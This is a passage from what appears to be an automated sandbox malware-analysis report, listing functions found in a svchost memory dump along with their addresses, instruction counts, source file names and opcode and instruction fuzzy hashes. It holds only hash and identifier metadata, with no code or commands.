                                                                              • Instruction ID: bebb8406a9526c31a1da8972a3d9af41289572bbd4e274aa09faba94afa07283
                                                                              • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                              • Instruction Fuzzy Hash: 3EE0CD35244314B7DB22AB44CD04F697B15DB507E0F104033FA085EB90C5B19C51D6D4
                                                                              Function 03A2823B Relevance: .0, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                              • Instruction ID: 6df77792f9dd573587d72fd9da3d0319bce509369d3a577792f4e907219690ea
                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                              • Instruction Fuzzy Hash: 7CE08C35101A20EEDB35FF19DE04B527AA9FB84B10F14486BF0820A5A487B8A891DB54
                                                                              Function 03AB92BC Relevance: .0, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                              • Instruction ID: 1200c969e43a5743e8d64b2310c09a40d4fd98969fbbf5507d2f6ab88761736d
                                                                              • Opcode Fuzzy Hash: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                              • Instruction Fuzzy Hash: 0EF0ED34651B84CFE72ADF04C1E1B5273BDF755B44F50055DD4464BFA2C73A9941CA40
                                                                              Function 03A32050 Relevance: .0, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                              • Instruction ID: 601dad5c80c12617f5d4743ce3e23024aaa2b594b4ad4ab87c3519fc28093661
                                                                              • Opcode Fuzzy Hash: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                              • Instruction Fuzzy Hash: 4DE0C2322006506BC722FF5DEE00F8A739EEFA5360F004222F1508B7D0CB64AC00C794
                                                                              Function 03A2A0E3 Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                              • Instruction ID: 5ca58db2cdc55280e822d0ef860c04dbec8a2b73236f7070fd50ea0e26cf28eb
                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                              • Instruction Fuzzy Hash: 1ED0123631617097CF29E7596914F67AD159BC1AA4F1A006E780AD7940C9158C42D6E0
                                                                              Function 03A402A0 Relevance: .0, Instructions: 13COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                              • Instruction ID: 880e27663e21d8a20c9055a319c5d6904da45485ca8a29adbb4b079c6035c6ac
                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                              • Instruction Fuzzy Hash: 4DD0C935212E80CFDA1ACF0DC5A4B16B3B8BB84B44F8504D6E641CBB61D66CD940CE00
                                                                              Function 03AB930B Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                              • Instruction ID: 632d3b0d76bb7d08aee6107e8458d0d5c7023bb214be5985c1e856d51f911031
                                                                              • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                              • Instruction Fuzzy Hash: 43D01735945AC48FE727CB08C165B917BF8F705B40F89009DE04247AA2C37C9984CB10
                                                                              Function 03A6C700 Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                              • Instruction ID: 0c8f2f15a9ff17853e7808da0b1fe326ad6be17876a823b7d93c5f23639fae69
                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                              • Instruction Fuzzy Hash: A8C01236250644AFC711EA94CD01F0177A9E798B40F004021F2044B670C571E820D644
                                                                              Function 03A50310 Relevance: .0, Instructions: 11COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                              • Instruction ID: 95bff0504406cec5cc201f72e0cf991c6552edae0daec6b6adc423965ac4311d
                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                              • Instruction Fuzzy Hash: 7ED01236100248EFCB01DF41D990D9A772AFBD8710F149019FD190B7108A31ED62DA50
                                                                              Function 03A30750 Relevance: .0, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                              • Instruction ID: 54cf3c959cba6ba43dd42daf1549acb4edaae4b9eb13ace2f51034a607eecbb7
                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                              • Instruction Fuzzy Hash: A5C048B9B01A41CFCF15EB2AD398F4977E8FB84740F1948D1E805CBB21E624E811CA10
                                                                              Function 03A74340 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                                                              • Instruction ID: 4f5b4623c9dff27b171f5295851ec73d05e3a1f9d48205e9d262bdda1c1e9b40
                                                                              • Opcode Fuzzy Hash: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                                                              • Instruction Fuzzy Hash: 56900231605804129140B25848C4586800A97E0301B96C012E0424558C8F188A565371
                                                                              Function 03A73090 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                                                              • Instruction ID: 1d54d1d9bd09668607714e1ffd1c9049cf6b1357f8c7e39cd06b43f6e8a6e90e
                                                                              • Opcode Fuzzy Hash: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                                                              • Instruction Fuzzy Hash: FA90022124140C02D140B2588454747400BC7D0701F96C012A0024558D8B1A8A6566B1
                                                                              Function 03A73010 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                              • Instruction ID: a9f046f472ae041aa9ab1269dc12bb4c1ca045a3c2b9b053e93a73cc8fea41fe
                                                                              • Opcode Fuzzy Hash: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                              • Instruction Fuzzy Hash: CB90022120184842D140B3584844B4F810A87E1302FD6C01AA4156558CCE1989555731
                                                                              Function 03A74650 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                                                              • Instruction ID: 9b6c94d190057ec0c99f38a1ffbe42ed098602b745881b9a3c029e2c805014b7
                                                                              • Opcode Fuzzy Hash: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                                                              • Instruction Fuzzy Hash: D5900261601504424140B2584844446A00A97E13013D6C116A0554564C8B1C89559279
                                                                              Function 03A72BA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                                                              • Instruction ID: bd5aec11f7a917f59858093a662180b6b57f313dec5733e9e4d6197ace2d1c29
                                                                              • Opcode Fuzzy Hash: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                                                              • Instruction Fuzzy Hash: 8F90023160540C02D150B2584454786400A87D0301F96C012A0024658D8B598B5576B1
                                                                              Function 03A72B80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                                                              • Instruction ID: 9f0212bf7eaeeebf89fe636263a96049ff3b913ef59b41b21d89ae7b387dfc7a
                                                                              • Opcode Fuzzy Hash: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                                                              • Instruction Fuzzy Hash: DC90023120140C02D104B25848446C6400A87D0301F96C012A6024659E9B6989917131
                                                                              Function 03A72BE0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                                                              • Instruction ID: 99f1909509e894226c65ffe029000fa59f8593dff52a4795a55c379d7f220421
                                                                              • Opcode Fuzzy Hash: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                                                              • Instruction Fuzzy Hash: F990023120544C42D140B2584444A86401A87D0305F96C012A0064698D9B298E55B671
                                                                              Function 03A72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                                                              • Instruction ID: 2b52c13725e8dd7f0cd6669340a04226487b6a364c2a99490ef91d9da8a08125
                                                                              • Opcode Fuzzy Hash: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                                                              • Instruction Fuzzy Hash: 4190023120140C02D180B258444468A400A87D1301FD6C016A0025658DCF198B5977B1
                                                                              Function 03A72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                                                              • Instruction ID: 49060d19ecef0a5904bf1671d538003d4a171ee58bfddd45c12a31b441553543
                                                                              • Opcode Fuzzy Hash: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                                                              • Instruction Fuzzy Hash: D79002A1201544924500F3588444B4A850A87E0301B96C017E1054564CCA2989519135
                                                                              Function 03A72AF0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                                                              • Instruction ID: a5223688f6abb881e12cf11eaba9a95051dd7c49413644d08c58e0321b2e575e
                                                                              • Opcode Fuzzy Hash: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                                                              • Instruction Fuzzy Hash: EE900225221404020145F658064454B444A97D63513D6C016F1416594CCB2589655331
                                                                              Function 03A72AD0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                                                              • Instruction ID: 59f9088fff3487e3ea323a96c53c24ff27f134106eddd6390f43d77e3a418e95
                                                                              • Opcode Fuzzy Hash: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                                                              • Instruction Fuzzy Hash: 4B900435311404030105F75C0744547404FC7D53513D7C033F1015554CDF35CD715131
                                                                              Function 03A739B0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                                                              • Instruction ID: 7e3f6e138cf15bcf951c92bf1d94aae68fc09b48b1a9639f62d079b5cdaa2739
                                                                              • Opcode Fuzzy Hash: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                                                              • Instruction Fuzzy Hash: BD90022124545502D150B25C4444656800AA7E0301F96C022A0814598D8A5989556231
                                                                              Function 03A72FA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                                                              • Instruction ID: 862c9a2c29e6b4f4d9be7dafc4b8161a4e5858567f33c7d16480529c7f84f6cf
                                                                              • Opcode Fuzzy Hash: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                                                              • Instruction Fuzzy Hash: 5290023120180802D100B2584848787400A87D0302F96C012A5164559E8B69C9916531
                                                                              Function 03A72FB0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                                                              • Instruction ID: f395d6521db4a6659c57406cb5216dcf6c434b789d4011497581894ad8c81e27
                                                                              • Opcode Fuzzy Hash: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                                                              • Instruction Fuzzy Hash: E3900221601404424140B2688884946800AABE1311796C122A0998554D8A5D89655675
                                                                              Function 03A72F90 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                                                              • Instruction ID: 85e24c5b67aef11bc723c4417f91d54dec2a8bee427fcca3f63a43713e790caa
                                                                              • Opcode Fuzzy Hash: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                                                              • Instruction Fuzzy Hash: 9A90023120180802D100B258485474B400A87D0302F96C012A1164559D8B2989516571
                                                                              Function 03A72FE0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                                                              • Instruction ID: 269aa5b9903bf4c6c8ee247f90942a250528b3b8f4b6f402b25910e3670f4eb2
                                                                              • Opcode Fuzzy Hash: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                                                              • Instruction Fuzzy Hash: F4900221211C0442D200B6684C54B47400A87D0303F96C116A0154558CCE1989615531
                                                                              Function 03A72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                                                              • Instruction ID: 7e5bb11c719795e81707f8a49892f40e9e9ba9841dca345d0b2f30796632da34
                                                                              • Opcode Fuzzy Hash: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                                                              • Instruction Fuzzy Hash: E990026134140842D100B2584454B46400AC7E1301F96C016E1064558D8B1DCD526136
                                                                              Function 03A72F60 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                                                              • Instruction ID: d8c1f408ebad77ecb54ddd81f3f78bc7baf83078ee147537737722d54d015f8d
                                                                              • Opcode Fuzzy Hash: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                                                              • Instruction Fuzzy Hash: 9390026121140442D104B2584444746404A87E1301F96C013A2154558CCA2D8D615135
                                                                              Function 03A72EA0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                                                              • Instruction ID: e8a50da451d5a3d606a2b96a9272713038d03c5b8b2a4a6807586778a7e61d52
                                                                              • Opcode Fuzzy Hash: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                                                              • Instruction Fuzzy Hash: 0590027120140802D140B2584444786400A87D0301F96C012A5064558E8B5D8ED56675
                                                                              Function 03A72E80 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                                                              • Instruction ID: e303f57d1a5663c1869d8415abfae552c449150872fe418899db69d36fc75ad6
                                                                              • Opcode Fuzzy Hash: c44e75ba04b98fd6e0901ef61242ad5f84440c998719e80c8d90d03f9934c765
                                                                              • Instruction Fuzzy Hash: 8190022160140902D101B2584444656400F87D0341FD6C023A1024559ECF298A92A131
                                                                              Function 03A72EE0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                                                              • Instruction ID: 241df3eaa6b3a87db98e35d66bfdd7e7a09ee1ce0026968ea7d9cd5be3f9d148
                                                                              • Opcode Fuzzy Hash: b9387c15e0f304d47f3eb94e3319f8025b068b97077c8ab15c80d1f38587ebfd
                                                                              • Instruction Fuzzy Hash: 9590026120180803D140B6584844647400A87D0302F96C012A2064559E8F2D8D516135
                                                                              Function 03A72E30 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                              • Instruction ID: 5d635efbf04ea7e90f25870dc8807114b4e00bb39f390a9a5b947059099fe3f3
                                                                              • Opcode Fuzzy Hash: 6037c3c08fc68a310cf7559adb636d79ffe3402f9f1345dd05f608bc5426b007
                                                                              • Instruction Fuzzy Hash: 9990022130140802D102B2584454646400EC7D1345FD6C013E1424559D8B298A53A132
                                                                              Function 03A72DB0 Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
